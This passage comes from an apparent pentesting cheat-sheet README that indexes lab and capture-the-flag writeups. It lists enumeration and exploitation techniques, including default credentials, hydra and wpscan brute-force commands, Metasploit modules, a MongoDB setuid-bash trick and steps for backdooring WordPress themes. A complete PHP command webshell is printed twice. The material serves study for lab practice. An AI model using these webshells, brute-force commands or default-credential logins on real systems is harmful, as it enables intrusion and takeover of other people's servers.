Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | | 19. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 20. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 21. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 22. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100"/> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | | 23. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100"/> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 24. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | | 25. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100"/> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 26. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 27. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/ratings.png" width="59" height="20"/> | [htb#1](https://www.hackthebox.eu/home/machines/profile/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100"/> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | | 28. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 29. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/ratings.png" width="59" height="20"/> | [htb#2](https://www.hackthebox.eu/home/machines/profile/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100"/> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | | 30. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 31. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 32. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/ratings.png" width="59" height="20"/> | [htb#64](https://www.hackthebox.eu/home/machines/profile/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100"/> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 33. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100"/> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 34. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100"/> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | | 35. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100"/> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 36. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100"/> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 37. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/ratings.png" width="59" height="20"/> | [htb#6](https://www.hackthebox.eu/home/machines/profile/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100"/> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 38. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/ratings.png" width="59" height="20"/> | [htb#108](https://www.hackthebox.eu/home/machines/profile/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100"/> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 39. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | <a name="ttps"></a> ## ☢️ TTPs [↟](#contents) <a name="enumerate"></a> ### ⚙️ Enumerate [🡑](#ttps) <a name="enumerate_app_apache"></a> #### enumerate_app_apache [⇡](#enumerate) ```shell use directory traversal to checkout the config file: /usr/local/etc/apache22/httpd.conf /etc/apache2/sites-enabled/000-default.conf useful when certain config changes block enumeration ``` --- <a name="enumerate_app_apache_tomcat"></a> #### enumerate_app_apache_tomcat [⇡](#enumerate) ```shell tomcat manager default creds: tomcat:tomcat admin:admin admin:password user:password tomcat:s3cret ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="enumerate_app_coldfusion_files"></a> #### enumerate_app_coldfusion_files [⇡](#enumerate) look for available sub driectories and files on a coldfusion install ```shell dirb http://<targetip>:<targetport> /usr/share/dirb/wordlists/vulns/coldfusion.txt ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="enumerate_app_coldfusion_version"></a> #### enumerate_app_coldfusion_version [⇡](#enumerate) find out the coldfusion install version ```shell http://<targetip>:<targetport>/CFIDE/adminapi/base.cfc?wsdl ``` [+] http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf (pg42) --- <a name="enumerate_app_drupal"></a> #### enumerate_app_drupal [⇡](#enumerate) ```shell version: http://<targetip>:<targetport>/CHANGELOG.txt bruteforce: ipaddr="<targetip>"; id=$(curl -s http://$ipaddr/user/ | grep "form_build_id" | cut -d"\"" -f6); hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V scan: /opt/droopescan/droopescan scan drupal -u http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_joomla"></a> #### enumerate_app_joomla [⇡](#enumerate) ```shell joomscan --url http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_mongo"></a> #### enumerate_app_mongo [⇡](#enumerate) ```shell mongo -p -u mark scheduler => connects to mongodb as user mark and allows interaction with db scheduler use scheduler => switch db db.getCollectionNames() => list all collections/tables db.tasks.find({}) => show all entries from collection/table db.tasks.insert({"cmd": "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;"}) => insert a new entry within table tasks ``` --- <a name="enumerate_app_nodejs"></a> #### enumerate_app_nodejs [⇡](#enumerate) ```shell check source and look at the js files to find interesting links/apis use burp to spider and create a sitemap of the website find app.js and look for db credentials (sql/mongo) try ssh using db credentials ``` --- <a name="enumerate_app_pfsense"></a> #### enumerate_app_pfsense [⇡](#enumerate) ```shell default credentials: admin/pfsense ``` --- <a name="enumerate_app_phpmyadmin"></a> #### enumerate_app_phpmyadmin [⇡](#enumerate) ```shell default credentials: admin/ admin/admin root/root root/password root/mysql ``` --- <a name="enumerate_app_powershell_history"></a> #### enumerate_app_powershell_history [⇡](#enumerate) For certain accounts (like `sql_svc`) that are both user and service accounts, we can look at the user's PowerShell history and find interesting information. ```shell type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_app_prtg"></a> #### enumerate_app_prtg [⇡](#enumerate) ```shell default credentials: prtgadmin/prtgadmin configuration and backup files (accessed via an open ftp/smb): c:\programdata\paessler\Configuration.dat c:\programdata\paessler\Configuration.old ``` --- <a name="enumerate_app_unrealirc"></a> #### enumerate_app_unrealirc [⇡](#enumerate) ```shell msfconsole use exploit/unix/irc/unreal_ircd_3281_backdoor set rhost <targetip> set rport <targetport> exploit ``` [+] https://snowscan.io/htb-writeup-irked/ --- <a name="enumerate_app_webmin"></a> #### enumerate_app_webmin [⇡](#enumerate) ```shell view any file - even root owned, run perl cgi scripts msf: auxiliary/admin/webmin/file_disclosure can view /etc/ldap.secret file that might give credentials can be used to run a perl cgi script (uploaded via some other means) to gain root reverse shell download shadow file and try cracking hashes download ssh authorized_keys for users (names obtained from shadow file), use edb:5720 and "ssh -i" ``` --- <a name="enumerate_app_wordpress"></a> #### enumerate_app_wordpress [⇡](#enumerate) ```shell default creds: admin/password look for phpmyadmin, plugins directories look for wp-config.php file (via an open smb/ftp share) => contains db creds, useful for phpmyadmin and ssh enumerate authors: http://192.168.92.167:<targetport>/?author=1 => will show username as "AUTHOR ARCHIVES: <username>" http://192.168.92.167:<targetport>/?author=2 => will not show username if author id is invalid wpuser http://192.168.92.134/ usernames wpscan --url http://192.168.92.134:80/ -e vp,vt,tt,cb,dbe,u,m bruteforce wordpress login: wpscan --url http://192.168.92.134 -P fsocity.dic.trimmed -U elliot wpscan --url http://192.168.92.169/backup_wordpress/ -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -U admin,john wpscan --disable-tls-checks --url https://192.168.92.165:12380/blogblog/ -P $HOME/toolbox/vulnhub/mrrobot1/pass.list -U elliot hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.92.169 http-post-form "/backup_wordpress/wp-login.php:log=admin&pwd=^PASS^:ERROR" wordpress to shell: #1 add webshell via /wp-admin/theme-editor.php?file=404.php a. "Appearance" -> "Editor" b. select "404 Template" (404.php) c. add php backdoor before the `<?php get_footer(); ?>` line and click "Update File" d. example php backdoor: /usr/share/webshells/php/php-reverse-shell.php e. run local netcat listener f. visit a non-existing page: http://192.168.92.191/wordpress/?p=<attackerport>99 #2 add webshell @ /wp-admin/ a. "Appearance" -> "Editor" b. select "Theme Footer" (footer.php) c. add php backdoor at the end of file and click "Update File" d. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ e. visit http://192.168.92.169/backup_wordpress/?cmd=cat%20/etc/passwd to run commands f. result will be concatenated to the end of the page #3 add webshell via media file @ /wp-admin/plugin-install.php a. "Upload plugin" -> "Browse" b. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ c. plugin install might fail, but php file will be uploaded as a media file d. visit http://192.168.92.169/backup_wordpress/wp-admin/upload.php to confirm file upload e. use http://192.168.92.169/backup_wordpress/wp-content/uploads/<year>/<monthid>/<filename>.php?cmd=cat%20/etc/passwd to run commands #4 metasploit: msf> use exploit/unix/webapp/wp_admin_shell_upload msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.92.169 msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup-wordpress msf exploit(unix/webapp/wp_admin_shell_upload) > set username john msf exploit(unix/webapp/wp_admin_shell_upload) > set password enigma msf exploit(unix/webapp/wp_admin_shell_upload) > exploit extract hashes from wp mysql db and crack via john: select concat_ws(':', user_login, user_pass) from wp_users; john --wordlist=/usr/share/wordlists/rockyou.txt hashes.wp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 4. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_nmap_initial"></a> #### enumerate_nmap_initial [⇡](#enumerate) run nmap initial scans ```shell sudo nmap -Pn -sC -sV -O -oN initial <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_tcp"></a> #### enumerate_nmap_tcp [⇡](#enumerate) run nmap full tcp scans ```shell nmap -Pn -sC -sV -p- --min-rate 10000 -oN tcp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_udp"></a> #### enumerate_nmap_udp [⇡](#enumerate) run nmap full udp scans ```shell nmap -Pn -sU -p- -oN udp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_proto_distcc"></a> #### enumerate_proto_distcc [⇡](#enumerate) ```shell msf: exploit/unix/misc/distcc_exec ``` --- <a name="enumerate_proto_dns"></a> #### enumerate_proto_dns [⇡](#enumerate) ```shell reverse lookup to find all hostnames associated with an ip: dig +noall +answer -x <ipaddress> @<dnsserver> dns enumeration: dnsenum -o outputfile -f /usr/share/dnsrecon/namelist.txt -o outputfile domain bruteforce: nmap -p 80 --script dns-brute.nse <domain.name> python dnscan.py -d <domain.name> -w ./subdomains-10000.txt zone transfer: dig axfr @<dnsserver> <domain.name> host -t axfr <domain.name> <dnsserver> host -l <domain.name> <dnsserver> ``` --- <a name="enumerate_proto_finger"></a> #### enumerate_proto_finger [⇡](#enumerate) ```shell finger username@<targetip> ``` --- <a name="enumerate_proto_ftp"></a> #### enumerate_proto_ftp [⇡](#enumerate) check if version is vulnerable and exploit is available. check if anonymous access is enabled. check if read permission for sensitive files. check if write permission within webroot/uploads or other critical directories. check if ftp root directory is also http root directory and upload php reverse shell. remember - binary and ascii transfer mode switch ```shell ftp passive mode: ftp -p 192.168.92.192 bruteforce ftp login: use auxiliary/scanner/ftp/ftp_login misc: nmap --script=*ftp* --script-args=unsafe=1 -p 20,21 <targetip> nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <targetip> hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f <targetip> ftp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://medium.com/@ranakhalil101/my-oscp-journey-a-review-fa779b4339d9 --- <a name="enumerate_proto_http"></a> #### enumerate_proto_http [⇡](#enumerate) identify web server, technology, application. identify versions. run nikto, dirb/dirbuster, gobuster scans. look at robots.txt. look at source code. check for default creds, lfi/rfi, sqli, wordpress ```shell bash /usr/share/sparta/scripts/x11screenshot.sh <targetip> cewl http://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage cewl https://<targetip>:<targetport>/ -m 6, 